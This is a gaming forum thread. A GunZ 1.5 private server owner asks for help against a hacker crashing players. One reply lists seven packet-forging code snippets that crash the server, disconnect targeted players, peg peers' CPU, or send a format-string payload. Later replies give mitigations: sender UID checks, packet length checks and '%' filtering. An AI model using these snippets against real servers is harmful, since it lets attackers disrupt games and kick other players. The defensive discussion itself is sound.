Hack 1.5 Crash Players. HELP!

[Mourplus]

In my gunz server in version 1.5, is running a hacker who was posted in:

Release GunZ Hack Proxy for AeriaGames (USA) & GunZ Ultra (PERU). - Page 5

and are closing the game of my players, somebody help me please?


Re: GunZ Hack Proxy is AeriaGames (USA) & Ultra GunZ (PERU).

* Note: Until your post count is 15 you will be able to send PMs to Staff only. *

Uh ... nothing to write.

Here's some exploitable commands:
1. MC_NET_CLEAR - Crash the server.
Code:

PHP Code:

    MCmdWriter Cmd;
    Cmd.WriteMUID (uidTarget) / / Some existing player's UID.
    Cmd.Finalize (MC_NET_CLEAR, MCFT_END);
    SendToServer (& cmd); 


2. MC_NET_ECHO - Send echo message to peer.
Code:

PHP Code:

 MCmdWriter Cmd;
    Cmd.WriteString ("^ 2Hello world.") / / Message to send.
    Cmd.Finalize (MC_NET_ECHO, MCFT_END);
    SendToPeer (& cmd);
    SendToClient (& cmd); 


3. MC_MATCH_LOGIN_FROM_DBAGENT_FAILED - Disconnect player from the server.
Code:

PHP Code:

MCmdWriter Cmd;
    Cmd.WriteMUID (uidTarget) / / Target UID you want to disconnect.
    Cmd.WriteInt (90002) / / Message ID to show.
    Cmd.Finalize (MC_MATCH_LOGIN_FROM_DBAGENT_FAILED, MCFT_END);
    SendToServer (& cmd); 


4. MC_PEER_BUFF_INFO - Crash the player with Full CPU usage.
Code:

PHP Code:

MCmdWriter Cmd;
    Cmd.WriteInt (sizeof (int) * 2) / / Blob size.
    Cmd.WriteInt (0) / / Blob each array element size.
    Cmd.WriteInt (INT_MAX) / / loop 2147483647 times.
    Cmd.Finalize (MC_PEER_BUFF_INFO, MCFT_END);
    SendToPeer (& cmd); 


5. MC_MATCH_REGISTERAGENT - Crash the server.
Code:

PHP Code:

 MCmdWriter Cmd;
    Cmd.WriteString ("% s% s"), / / ​​invalid string.
    Cmd.WriteInt (0) / / port.
    Cmd.WriteInt (0) / / UDP port.
    Cmd.Finalize (MC_MATCH_REGISTERAGENT, MCFT_END);
    SendToServer (& cmd); 


6. MC_NET_BANPLAYER_FLOODING - Disconnect player from the server.
Code:

PHP Code:

MCmdWriter Cmd;
    Cmd.WriteMUID (uidTarget) / / Target UID you want to disconnect.
    Cmd.Finalize (MC_NET_BANPLAYER_FLOODING, MCFT_END);
    SendToServer (& cmd); 


7. MC_MATCH_DUELTOURNAMENT_REQUEST_JOINGAME - Send player to the Duel Tournament.
Code:

PHP Code:

MCmdWriter Cmd;
    Cmd.WriteMUID (uidTarget) / / Target UID you want to kick out.
    Cmd.Finalize (MC_MATCH_DUELTOURNAMENT_REQUEST_JOINGAME, MCFT_END);
    SendToServer (& cmd); 


[MentaL]

[Mourplus]

Help me patch gunzproxy.exe ? ;\

[sahar042]

Hmm i didn't patched it yet but i am going to patch it soon on my server, For now you can try to change packet encryption on the source...
But if the "Hacker" that using hacks on your server with gunzproxy know how to find packet encryption via memory than it's useless but you can give it a try i guess...

[Mourplus]

I have an idea '-'

[PenguinGuy]

On ZGameClient_OnCommand.cpp, check the UID of the sender. If it's coming from another client, don't allow.
However, note that I don't remember what packet does what anymore.
Edit-- May be another source file that handles MC_NET_CLEAR and alike.

MC_NET_CLEAR
MC_MATCH_LOGIN_FROM_DBAGENT_FAILED
MC_NET_BANPLAYER_FLOODING
MC_MATCH_DUELTOURNAMENT_REQUEST_JOINGAME
^ Shouldn't be allowed by other players.

MC_PEER_BUFF_INFO
^ Check the length of the packet.

MC_MATCH_REGISTERAGENT
^ Either kill "%" acceptance for your server, or query it out of the string.

[sahar042]

On ZGameClient_OnCommand.cpp, check the UID of the sender. If it's coming from another client, don't allow.
However, note that I don't remember what packet does what anymore.
Edit-- May be another source file that handles MC_NET_CLEAR and alike.

MC_NET_CLEAR
MC_MATCH_LOGIN_FROM_DBAGENT_FAILED
MC_NET_BANPLAYER_FLOODING
MC_MATCH_DUELTOURNAMENT_REQUEST_JOINGAME
^ Shouldn't be allowed by other players.

MC_PEER_BUFF_INFO
^ Check the length of the packet.

MC_MATCH_REGISTERAGENT
^ Either kill "%" acceptance for your server, or query it out of the string.

Thank you.

[Solaire]

I'll release a patch in a bit.